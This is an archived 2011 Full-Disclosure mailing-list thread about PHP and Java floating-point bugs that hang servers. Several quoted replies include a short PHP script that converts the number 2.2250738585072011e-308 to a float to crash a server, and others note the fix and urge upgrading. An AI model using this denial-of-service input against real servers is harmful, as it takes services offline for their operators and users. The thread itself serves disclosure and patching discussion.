Re: [Full-disclosure] {Java,PHP} Server Exploits
Too all,
PHP version fixed in version 5.3.5 and 5.2.17 released on Jan 6th 2011.
And bug only in the 32-bit version off PHP (even on 64bit a cpu)
http://www.php.net/archive/2011.php#id2011-01-06-1
Le reg report that oracle fixed the mark of the beast in there new patch.
After it been there for 10 years.
http://www.theregister.co.uk/2011/02/09/java_floating_point_bug_fixed/
php devteam time one month
java developers about te years
So yay opensource.
With friendly greetings,
Yorian
PS,
Don't forget to upgrade
2011/2/10 Troy Aerojam
> It borders idiocy this hasn't been plugged.
>
> Aerojam
>
> --- On *Wed, 2/9/11, Leon Kaiser * wrote:
>
>
> From: Leon Kaiser
>
> Subject: [Full-disclosure] {Java,PHP} Server Exploits
> To: full-disclosure@lists.grok.org.uk
> Date: Wednesday, February 9, 2011, 5:40 PM
>
>
>
> http://developers.slashdot.org/story/11/02/09/025237/Java-Floating-Point-Bug-Can-Lock-Up-Servers
>
> http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Server<http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Servers>
>
>
> -Inline Attachment Follows-
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] {Java,PHP} Server Exploits
It borders idiocy this hasn't been plugged.
Aerojam
--- On Wed, 2/9/11, Leon Kaiser wrote:
From: Leon Kaiser
Subject: [Full-disclosure] {Java,PHP} Server Exploits
To: full-disclosure@lists.grok.org.uk
Date: Wednesday, February 9, 2011, 5:40 PM
http://developers.slashdot.org/story/11/02/09/025237/Java-Floating-Point-Bug-Can-Lock-Up-Servers
http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Server
-Inline Attachment Follows-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] {Java,PHP} Server Exploits
Breakin' fuckin' news! (Or not!) One of those stories is over a month old,
the other is over a week old. Nothing particularly exciting or unexpected in
either. It's just typical GPL code quality.
From: litera...@gmail.com
To: full-disclosure@lists.grok.org.uk
Date: Wed, 9 Feb 2011 12:40:54 -0500
Subject: [Full-disclosure] {Java,PHP} Server Exploits
http://developers.slashdot.org/story/11/02/09/025237/Java-Floating-Point-Bug-Can-Lock-Up-Servers
http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Server
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] {Java,PHP} Server Exploits
You've misread my statement, I didn't say floating point is trivial.
I actually said securing a base data type is trivial.
I'd give you credit if this was a complex issue in, say, deserializing some
complex type, but not float.
How many simple types does PHP have? Integer, float, string and boolean.
Keep in mind that when we talk about floating point in PHP, we're talking
about The Float (64bit || 32bit), not tens of different floating types
ranging from 8 bits to 1024...
Cheers,
Chris.
On Wed, Feb 9, 2011 at 9:13 PM, wrote:
> On Wed, 09 Feb 2011 20:54:41 +0100, Christian Sciberras said:
>
> > $f=floatval("2.2250738585072011e-308");
> > echo 'Try 2 => '.$f.'';
>
> > Plus, I'm a bit amazed such a bug exists in PHP - since converting to
> > floating point is a trivial operation, it should have been limited and
> > safe-guarded from the start.
>
> Take a careful gander at that number, then go look at the floating point
> spec -
> it's a specific corner case that isn't obviously trivial to get right
> (doing
> floating point *right* is a lot harder than it looks - take a class on
> numerical methods sometime, you spend 75% of your time dealing with
> rounding
> errors in the last bit).
>
> Having said that, anybody writing floating point support for a package
> should
> probably google 'floating point paranoia' and learn what sort of things to
> test
> for. :)
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] {Java,PHP} Server Exploits
On Wed, 09 Feb 2011 20:54:41 +0100, Christian Sciberras said:
> $f=floatval("2.2250738585072011e-308");
> echo 'Try 2 => '.$f.'';
> Plus, I'm a bit amazed such a bug exists in PHP - since converting to
> floating point is a trivial operation, it should have been limited and
> safe-guarded from the start.
Take a careful gander at that number, then go look at the floating point spec -
it's a specific corner case that isn't obviously trivial to get right (doing
floating point *right* is a lot harder than it looks - take a class on
numerical methods sometime, you spend 75% of your time dealing with rounding
errors in the last bit).
Having said that, anybody writing floating point support for a package should
probably google 'floating point paranoia' and learn what sort of things to test
for. :)
pgp55xZbdpFvk.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] {Java,PHP} Server Exploits
Christian, this issue has been 'floating' around for several months now.
On Wed, Feb 9, 2011 at 7:56 PM, Christian Sciberras wrote:
> Ah, been reading more about it, seems it was fixed.
>
> Still, there should have been safeguards around this - I'm thinking they
> should check existing conversion routines to ensure they're safe...
>
>
>
>
> On Wed, Feb 9, 2011 at 8:54 PM, Christian Sciberras wrote:
>
>> Was it fixed? What's the current status?
>>
>> The sounds like a major issue, and the lack of info about it is darn
>> impressive.
>>
>>
>> I tried it on my test Windows WAMP server:
>>
>> >
>> ob_implicit_flush(true);
>>
>> echo 'Start test...';
>>
>> $f=(float)"2.2250738585072011e-308";
>> echo 'Try 1 => '.$f.'';
>>
>> $f=floatval("2.2250738585072011e-308");
>> echo 'Try 2 => '.$f.'';
>>
>> $f="2.2250738585072011e-308";
>> echo 'Try 3 => '.(float)$f.'';
>>
>> echo 'Test failed, server not vulnerable!';
>>
>> ?>
>>
>> All three tests succeeded in crashing the server.
>>
>> With all due respect, this should NOT have been disclosed without being
>> FIXED (as it seems to me).
>> Plus, I'm a bit amazed such a bug exists in PHP - since converting to
>> floating point is a trivial operation, it should have been limited and
>> safe-guarded from the start.
>> There are a lot of servers out there happily accepting input as floating
>> point values, this bug should be top priority...
>>
>>
>> Chris.
>>
>>
>>
>> On Wed, Feb 9, 2011 at 6:40 PM, Leon Kaiser wrote:
>>
>>>
>>> http://developers.slashdot.org/story/11/02/09/025237/Java-Floating-Point-Bug-Can-Lock-Up-Servers
>>>
>>> http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Server
>>>
>>>
>>> ___
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] {Java,PHP} Server Exploits
Ah, been reading more about it, seems it was fixed.
Still, there should have been safeguards around this - I'm thinking they
should check existing conversion routines to ensure they're safe...
On Wed, Feb 9, 2011 at 8:54 PM, Christian Sciberras wrote:
> Was it fixed? What's the current status?
>
> The sounds like a major issue, and the lack of info about it is darn
> impressive.
>
>
> I tried it on my test Windows WAMP server:
>
>
> ob_implicit_flush(true);
>
> echo 'Start test...';
>
> $f=(float)"2.2250738585072011e-308";
> echo 'Try 1 => '.$f.'';
>
> $f=floatval("2.2250738585072011e-308");
> echo 'Try 2 => '.$f.'';
>
> $f="2.2250738585072011e-308";
> echo 'Try 3 => '.(float)$f.'';
>
> echo 'Test failed, server not vulnerable!';
>
> ?>
>
> All three tests succeeded in crashing the server.
>
> With all due respect, this should NOT have been disclosed without being
> FIXED (as it seems to me).
> Plus, I'm a bit amazed such a bug exists in PHP - since converting to
> floating point is a trivial operation, it should have been limited and
> safe-guarded from the start.
> There are a lot of servers out there happily accepting input as floating
> point values, this bug should be top priority...
>
>
> Chris.
>
>
>
> On Wed, Feb 9, 2011 at 6:40 PM, Leon Kaiser wrote:
>
>>
>> http://developers.slashdot.org/story/11/02/09/025237/Java-Floating-Point-Bug-Can-Lock-Up-Servers
>>
>> http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Server
>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] {Java,PHP} Server Exploits
Was it fixed? What's the current status?
The sounds like a major issue, and the lack of info about it is darn
impressive.
I tried it on my test Windows WAMP server:
';
$f=(float)"2.2250738585072011e-308";
echo 'Try 1 => '.$f.'';
$f=floatval("2.2250738585072011e-308");
echo 'Try 2 => '.$f.'';
$f="2.2250738585072011e-308";
echo 'Try 3 => '.(float)$f.'';
echo 'Test failed, server not vulnerable!';
?>
All three tests succeeded in crashing the server.
With all due respect, this should NOT have been disclosed without being
FIXED (as it seems to me).
Plus, I'm a bit amazed such a bug exists in PHP - since converting to
floating point is a trivial operation, it should have been limited and
safe-guarded from the start.
There are a lot of servers out there happily accepting input as floating
point values, this bug should be top priority...
Chris.
On Wed, Feb 9, 2011 at 6:40 PM, Leon Kaiser wrote:
>
> http://developers.slashdot.org/story/11/02/09/025237/Java-Floating-Point-Bug-Can-Lock-Up-Servers
>
> http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Server
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] {Java,PHP} Server Exploits
http://developers.slashdot.org/story/11/02/09/025237/Java-Floating-Point-Bug-Can-Lock-Up-Servers http://it.slashdot.org/story/11/01/06/1820208/PHP-Floating-Point-Bug-Crashes-Server ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
